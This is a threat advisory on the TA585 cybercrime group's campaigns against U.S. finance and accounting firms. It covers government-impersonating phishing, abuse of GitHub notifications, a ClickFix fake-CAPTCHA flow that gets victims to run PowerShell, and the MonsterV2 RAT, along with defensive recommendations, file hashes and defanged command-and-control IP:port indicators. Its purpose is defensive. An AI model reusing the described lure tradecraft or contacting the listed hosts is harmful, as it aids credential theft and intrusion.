TA585 Leverages ClickFix Technique and MonsterV2 Malware

Summary

The financially motivated cybercriminal group TA585 has been actively targeting the finance and accounting sectors in the United States throughout 2025, deploying advanced social engineering and ClickFix-based infection chains to deliver the MonsterV2 malware. The group’s campaigns frequently impersonate U.S. government agencies such as the IRS and Small Business Administration (SBA) to deceive victims and establish credibility.

Operating as a vertically integrated cybercrime entity, TA585 controls its entire attack infrastructure, including email delivery systems, malware hosting servers, and payload deployment mechanisms, providing operational autonomy and resilience.

The group employs multiple malware families—including MonsterV2, Lumma Stealer, and Rhadamanthys—to conduct credential theft, data exfiltration, and remote access operations. MonsterV2, a Malware-as-a-Service (MaaS) platform priced between $800 and $2,000 per month, is TA585’s preferred payload due to its modular capabilities and integrated geo-fencing features that exclude CIS countries from infection.

Actor Details

TA585 differentiates itself from typical cybercriminal operations through complete self-managed control of its attack chain, allowing the actor to maintain stealth and efficiency while minimizing external dependencies.

Key Techniques and Tactics

• Government-Themed Lures: The group sends phishing emails impersonating U.S. government institutions, often using subjects related to taxes or compliance.
• GitHub Abuse for Delivery: TA585 exploits GitHub notifications by tagging legitimate accounts within repositories, prompting GitHub to automatically send authentic notification emails. These emails contain malicious links, leveraging GitHub’s trusted domain reputation to bypass email security filters.
• ClickFix Infection Technique: Victims are directed to a malicious webpage displaying a fake CAPTCHA prompt, instructing them to press Win+R and execute a PowerShell command. This manual interaction bypasses browser-based security restrictions and endpoint detection mechanisms.
• CoreSecThree Infrastructure: The lure webpage maintains continuous communication (“beaconing”) with the attacker’s server. The final payload is delivered only when the MonsterV2 sample successfully checks in from the same IP address, ensuring precise targeting.
• Malware Features:
  • MonsterV2: A premium MaaS RAT supporting credential theft, file exfiltration, webcam access, and remote control.
  • Lumma Stealer & Rhadamanthys: Deployed in parallel campaigns for data collection and financial credential harvesting.
  • SonicCrypt Crypter: Used for obfuscation and evasion.

TA585’s sophistication lies in its adaptability, technical automation, and the ability to manipulate trusted ecosystems like GitHub to deploy stealthy, precision-targeted malware against U.S.-based financial organizations.

Recommendations

• User Awareness Training: Conduct security awareness programs to help employees recognize phishing attempts, especially those impersonating government agencies (IRS, SBA). Reinforce caution against executing PowerShell commands or interacting with fake CAPTCHA prompts.
• Restrict PowerShell Access: Limit PowerShell usage to administrative accounts and apply group policies that prevent script execution via the Windows Run dialog (Win+R).
• Enhance Email Security: Strengthen email filtering mechanisms to identify phishing campaigns leveraging legitimate services like GitHub. Continuously update filters using threat intelligence feeds.
• Monitor Web Behavior: Deploy web content filters and monitor for suspicious JavaScript or CAPTCHA overlays indicative of ClickFix activity.
• Advanced Endpoint Detection: Utilize EDR and NGAV solutions with behavior-based detection to identify encrypted or obfuscated payloads such as MonsterV2 or SonicCrypt-packed binaries.

Indicators of Compromise (IoCs)

SHA256 Hashes:

• ccac0311b3e3674282d87db9fb8a151c7b11405662159a46dda71039f2200a67
• 666944b19c707afaa05453909d395f979a267b28ff43d90d143cd36f6b74b53e
• 7cd1fd7f526d4f85771e3b44f5be064b24fbb1e304148bbac72f95114a13d8c5
• 0e83e8bfa61400e2b544190400152a54d3544bf31cfec9dda21954a79cf581e9
• d221bf1318b8c768a6d824e79c9e87b488c1ae632b33848b638e6b2d4c76182b
• 69e9c41b5ef6c33b5caff67ffd3ad0ddd01a799f7cde2b182df3326417dfb78e
• 6237f91240abdbe610a8201c9d55a565aabd2419ecbeb3cd4fe387982369f4ae
• b36aac2ea25afd2010d987de524f9fc096bd3e1b723d615a2d85d20c52d2a711
• 912ef177e319b5010a709a1c7143f854e5d1220d176bc130c5564f5efe8145ed
• ba72e8024c90aeffbd56cdf2ab9033a323b63c83bd5df19268978cded466214e
• e7bcd70f0ee4a093461cfb964955200b409dfffd3494b692d54618d277cb309e
• 399d3e0771b939065c980a5e680eec6912929b64179bf4c36cefb81d77a652da

IPv4:PORT Indicators:

• 139[.]180[.]160[.]173[:]7712
• 155[.]138[.]150[.]12[:]7712
• 83[.]217[.]208[.]77[:]7712
• 91[.]200[.]14[.]69[:]7712
• 212[.]102[.]255[.]102[:]7712
• 84[.]200[.]154[.]105[:]7712
• 144[.]172[.]117[.]158[:]7712
• 109[.]120[.]137[.]128[:]7712
• 84[.]200[.]17[.]240[:]7712

• 84[.]200[.]77[.]213[:]7712

MITRE ATT&CK TTPs

References

• Proofpoint – Tracking TA585 and Its MonsterV2 Arsenal

• Hive Pro – ClickFix Deception: Hackers Use SharePoint and Graph API to Deploy Havoc Malware